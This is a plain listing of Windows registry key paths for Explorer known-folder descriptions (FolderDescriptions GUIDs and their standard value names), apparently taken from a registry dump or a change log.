HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E52AB10-F80D-49DF-ACB8-4330F5687855}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{98EC0E18-2098-4D44-8644-66979315A281}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{18989B1D-99B5-455B-841C-AB7C74E4DDFC}\PropertyBag
